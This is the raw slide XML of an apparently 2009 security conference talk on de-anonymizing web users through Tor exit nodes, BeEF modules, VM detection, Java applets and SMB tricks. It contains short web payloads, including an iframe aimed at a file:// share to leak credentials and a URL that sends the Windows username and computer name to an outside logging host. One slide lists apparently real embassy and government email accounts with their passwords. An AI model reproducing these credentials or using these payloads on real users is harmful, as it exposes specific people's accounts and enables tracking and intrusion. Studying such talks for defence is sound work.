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7"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="287" r:id="rId3"/>
    <p:sldId id="342" r:id="rId4"/>
    <p:sldId id="401" r:id="rId5"/>
    <p:sldId id="404" r:id="rId6"/>
    <p:sldId id="405" r:id="rId7"/>
    <p:sldId id="406" r:id="rId8"/>
    <p:sldId id="422" r:id="rId9"/>
    <p:sldId id="424" r:id="rId10"/>
    <p:sldId id="434" r:id="rId11"/>
    <p:sldId id="413" r:id="rId12"/>
    <p:sldId id="408" r:id="rId13"/>
    <p:sldId id="436" r:id="rId14"/>
    <p:sldId id="439" r:id="rId15"/>
    <p:sldId id="437" r:id="rId16"/>
    <p:sldId id="411" r:id="rId17"/>
    <p:sldId id="409" r:id="rId18"/>
    <p:sldId id="440" r:id="rId19"/>
    <p:sldId id="421" r:id="rId20"/>
    <p:sldId id="398" r:id="rId21"/>
    <p:sldId id="426" r:id="rId22"/>
    <p:sldId id="427" r:id="rId23"/>
    <p:sldId id="428" r:id="rId24"/>
    <p:sldId id="432" r:id="rId25"/>
    <p:sldId id="425" r:id="rId26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28625" indent="-215900" algn="l" defTabSz="457200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644525" indent="-214313" algn="l" defTabSz="457200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860425" indent="-212725" algn="l" defTabSz="457200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076325" indent="-215900" algn="l" defTabSz="457200" rtl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46" autoAdjust="0"/>
    <p:restoredTop sz="75126" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="84" d="100"/>
          <a:sy n="84" d="100"/>
        </p:scale>
        <p:origin x="234" y="9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Jabra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (maybe need a picture)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Robert (1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st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and 5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bullet) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Jabra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th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Robert (1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> bullet)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Jabra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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Jabra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Jabra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Jabra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and time check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Jabra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (1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) Robert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th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Timecheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> minutes)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Intro 30 seconds each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&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jabra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> says Google is big brother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Robert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Jabra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Robert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????!???@??@ do we even want to do this slide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Jabra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Jabra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mincho" charset="0"/>
              <a:cs typeface="msmincho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2875" cy="4106863"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jabra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lIns="50397" tIns="0" rIns="5039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7F61-10DA-4893-A7B9-FF043A98BC48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E303-D07C-4873-BD5A-ADE1FA7AA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57A9-67CF-4DC2-B6AD-0A33CB86E228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F068-1CE6-4F17-BBD3-3E0BB12A6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1A8F-31CA-4850-9C7D-204E2FCB079C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27A9-86B4-4D4A-A59E-323B13908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D644-A4CA-4F37-86E5-FF9FF0EFEC6C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9B9E-1B6F-400E-AF3A-D2BBDDCE5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E102-358A-4A3B-A019-7C265BBA39D3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BFBB-3E97-4DCC-9292-6D0ED81A0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4DF3-0226-4221-9859-5D015E7CC637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BAF5-BB4C-4F30-9B7C-22544DE01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1AEF-5D02-4CB7-A904-84A4D61D899F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7060-180C-45C5-85B8-69B74A50D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F50B-4B4D-4D60-A779-3D688AC3AE55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5BEF-DD4F-4F6E-84E4-1C290AAF0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EA3D-279B-4F28-83D1-447B0459B99A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C769-E55C-4644-BE12-EF31273FD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7D18-077A-42B8-93D2-11522F6AB92C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00C2-414A-49F7-AFD6-A6A9FE3B8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3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rIns="50397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F369-6674-4A93-9DCB-A256DC2DD870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4EEB-997D-4901-BCB1-92DEBEBF7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4150" cy="1258887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3238" y="7073900"/>
            <a:ext cx="2352675" cy="401638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EE321AB-5DF5-477D-B07D-FC9FA1C99A91}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>8/2/2009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44875" y="7073900"/>
            <a:ext cx="3190875" cy="401638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736013" y="7073900"/>
            <a:ext cx="841375" cy="401638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2903BD-034E-496D-A8AD-44F36D77F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Lucida Sans" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="603250" indent="-452438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263" indent="-3111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363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2"/>
        <a:buChar char="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63" indent="-2000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000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ctheory-logo-2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect b="2390"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="925512" y="2865436"/>
            <a:ext cx="3886200" cy="182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45112" y="3094037"/>
            <a:ext cx="3810000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logo here…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Logo_noTa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7912" y="2865437"/>
            <a:ext cx="47845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Funny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>thing about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>usernames they often look </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>like this: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2" y="2332037"/>
            <a:ext cx="7162800" cy="4622801"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Common usernames:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Administrator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>root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first].[last]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/>
              <a:t>first]_[last]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/>
              <a:t>first]-[last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handle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>… full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>name of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>victim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Interesting more on this later….</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="leakage.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="5706" t="7343" b="11885"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5954712" y="2027237"/>
            <a:ext cx="3440113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Breaking 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70340" y="2273422"/>
            <a:ext cx="5268912" cy="53038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100 embassy passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Breach proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>honeypots</a:t>
            </a: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Open Proxies you trust?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HackedTor.exe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200" dirty="0" smtClean="0"/>
              <a:t>Setup the Client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200" dirty="0" smtClean="0"/>
              <a:t>Tor node just logs everything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200" dirty="0" smtClean="0"/>
              <a:t>We can play </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>MiTM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> like Jay</a:t>
            </a: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1600" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>img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="http://dige6xxwpt2knqbv.onion/wink.gif" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>="alert('You are using Tor')" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>="alert('You are not using tor')"&gt; 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673"/>
            <a:ext cx="2373311" cy="1863048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802312" y="1493837"/>
            <a:ext cx="44196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Kazakhstan Embassy in Egypt 213.131.64.229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kazaemb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piramid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Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp</a:t>
            </a:r>
          </a:p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UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password</a:t>
            </a:r>
          </a:p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Defense Research &amp; Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1</a:t>
            </a:r>
          </a:p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Indian Embassy in USA amb@indianembassy.org 1234</a:t>
            </a:r>
          </a:p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Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir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accra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Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir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kenya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0" lvl="1" indent="7938" defTabSz="914400" eaLnBrk="0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Hong Kong Liberal Party 202.123.79.164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miriamlau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123456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Browser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39712" y="1798637"/>
            <a:ext cx="6400800" cy="57610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err="1" smtClean="0"/>
              <a:t>Mr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> T</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="27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err="1" smtClean="0"/>
              <a:t>Plugins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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History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Screen Resolution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err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a: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VMware detection (IE only)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err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1250879" lvl="2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500" dirty="0" smtClean="0"/>
              <a:t> (Java, Flash and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" err="1" smtClean="0"/>
              <a:t>Quicktime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>)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Setup script in Backtrack4</a:t>
            </a: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But…. The Cloud is the new Hotness!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9512" y="1988199"/>
            <a:ext cx="3756090" cy="49158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Virtualization/Cloud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39712" y="2027237"/>
            <a:ext cx="6400800" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"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VM Detection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200" dirty="0" smtClean="0"/>
              <a:t>VMware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200" dirty="0" smtClean="0"/>
              <a:t>QEMU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200" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Amazon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>EC2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Detection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Identify each region</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="3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 on:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0"/>
            <a:r>
              <a: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Firefox and IE 6, 7 and 8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0"/>
            <a:r>
              <a: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 on Linux and Windows </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0"/>
            <a:r>
              <a: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doesn’t work - 64 bit issue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New </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Module!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Leverage this knowledge in our attacks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6" name="Picture 5" descr="cloud-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5712" y="2484437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err="1" smtClean="0"/>
              <a:t>Pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Dem v0hns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659312" y="1570037"/>
            <a:ext cx="5421313" cy="3886200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Java on the client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Malicious Java Applet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Client running old/vulnerable software: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err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> and/or Browser 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err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> exploit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700" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="metasplo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12" y="4922837"/>
            <a:ext cx="6965641" cy="2215152"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="java appl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712" y="1798637"/>
            <a:ext cx="4466803" cy="2743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BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to the MAX!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1341436"/>
            <a:ext cx="9074150" cy="6218239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BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TOR detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VM detection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, QEMU, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>VirtualBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and EC2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AJAX “Ping” Sweep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Payload Applet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Autopwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> / New Browser 0day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Updated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visited URLs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Alexa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> top 500)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>New version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> coming…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://www.bindshell.net/beef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Real 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39712" y="2027237"/>
            <a:ext cx="4724400" cy="55324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Java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Java internal IP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Flash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err="1" smtClean="0"/>
              <a:t>scp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>:// (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>winSCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>)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Word/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> bugs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err="1" smtClean="0"/>
              <a:t>itms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>: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Already part of decloak.net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512" y="1646237"/>
            <a:ext cx="4572000" cy="4572000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400" y="6675437"/>
            <a:ext cx="80375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2" y="1646237"/>
            <a:ext cx="5369631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File System Enumeration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951037"/>
            <a:ext cx="5486400" cy="56086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res:// timing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res:// timing without JavaScript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err="1" smtClean="0"/>
              <a:t>smbenum</a:t>
            </a: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912" y="4618037"/>
            <a:ext cx="3585689" cy="2630377"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="r_mog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312" y="4618037"/>
            <a:ext cx="18923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6712" y="5913437"/>
            <a:ext cx="1447799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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Wtf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?”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8512" y="1798637"/>
            <a:ext cx="2286000" cy="268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Usernames and Computer Names!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0" y="1951037"/>
            <a:ext cx="5573712" cy="56086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But seriously – that’s just terrible, let’s just get the username and computer name directly!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Cut and paste</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>http://ha.ckers.org/log.cgi?rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz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SMB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1600" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>="file:///\\2.2.2.2\"&gt; &lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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4487" y="2027237"/>
            <a:ext cx="4656138" cy="3492103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702" y="4694237"/>
            <a:ext cx="1016249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err="1" smtClean="0"/>
              <a:t>SMBenum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0" y="2408237"/>
            <a:ext cx="6716712" cy="51514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SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> only finds certain types of files and only if known prior to testing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SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> could also gather usernames through brute force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Usernames + res:// timing could gather programs that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>smbenum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> alone couldn’t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2" y="1417637"/>
            <a:ext cx="338343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/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About Us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1306512" y="2101850"/>
            <a:ext cx="8305800" cy="4930775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Robert “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>RSnake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>” Hansen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SecTheory LLC - CEO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http://www.sectheory.com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http://ha.ckers.org – the lab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http://sla.ckers.org – the forum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Joshua “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Jabra”Abraham</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Rapid7 LLC - Security Researcher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http://www.rapid7.com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http://blog.spl0it.org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4" name="Content Placeholder 3" descr="01-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13" y="2387449"/>
            <a:ext cx="8999537" cy="4156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4" name="Content Placeholder 3" descr="01-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513" y="2387449"/>
            <a:ext cx="8999537" cy="4156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4" name="Content Placeholder 3" descr="01-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2441" y="1844363"/>
            <a:ext cx="8259391" cy="4821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4" name="Content Placeholder 3" descr="01-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9440" y="1844363"/>
            <a:ext cx="8245392" cy="4821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0wns Us!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2" y="1320251"/>
            <a:ext cx="794226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829022" y="6115909"/>
            <a:ext cx="6705600" cy="407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9912" y="1722437"/>
            <a:ext cx="7704662" cy="5978511"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Robert “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>RSnake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>” Hansen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http://www.sectheory.com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http://ha.ckers.org – the lab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 smtClean="0"/>
              <a:t>http://sla.ckers.org – the forum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="28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300" dirty="0" smtClean="0"/>
              <a:t>h_aT_ckers_d0t_org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300" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Joshua “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Jabra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>” Abraham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http://www.rapid7.com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http://blog.spl0it.org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http://www.spl0it.org/files/talks/defcon09/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1250879" lvl="2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200" dirty="0" smtClean="0"/>
              <a:t>Final version of Slides and Demos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Jabra_aT_spl0it_d0t_org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De-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Anonymizing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>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39712" y="2255837"/>
            <a:ext cx="5791200" cy="53038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Why does this matter?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Privacy advocacy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People think they’re safe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dirty="0" smtClean="0"/>
              <a:t>Privacy is not a guarantee.  It can be taken from you.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dirty="0" smtClean="0"/>
              <a:t>True anonymity is actually extremely difficult to achieve!!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So we decided to attack users instead of websites for once.</a:t>
            </a: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0912" y="2941637"/>
            <a:ext cx="3699959" cy="31386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Why is Privacy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744912" y="1951037"/>
            <a:ext cx="6096000" cy="56086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Safety from trolls who want to drop docs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Safer for political dissidents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Safer for potential victims of violent crimes (women, children)…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Allows people to be themselves (for good or bad)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Safer for whistle blowers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Increases freedoms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3037"/>
            <a:ext cx="3843338" cy="28825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Why is Privacy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39712" y="2332037"/>
            <a:ext cx="6400800" cy="52276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Haven for “evildoers”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Allows them to attack easily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Allows them to retreat easily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Allows them to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> data easily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Hurts law enforcement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Prevents “social compact” rules of order from working in online contexts.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6712" y="2332037"/>
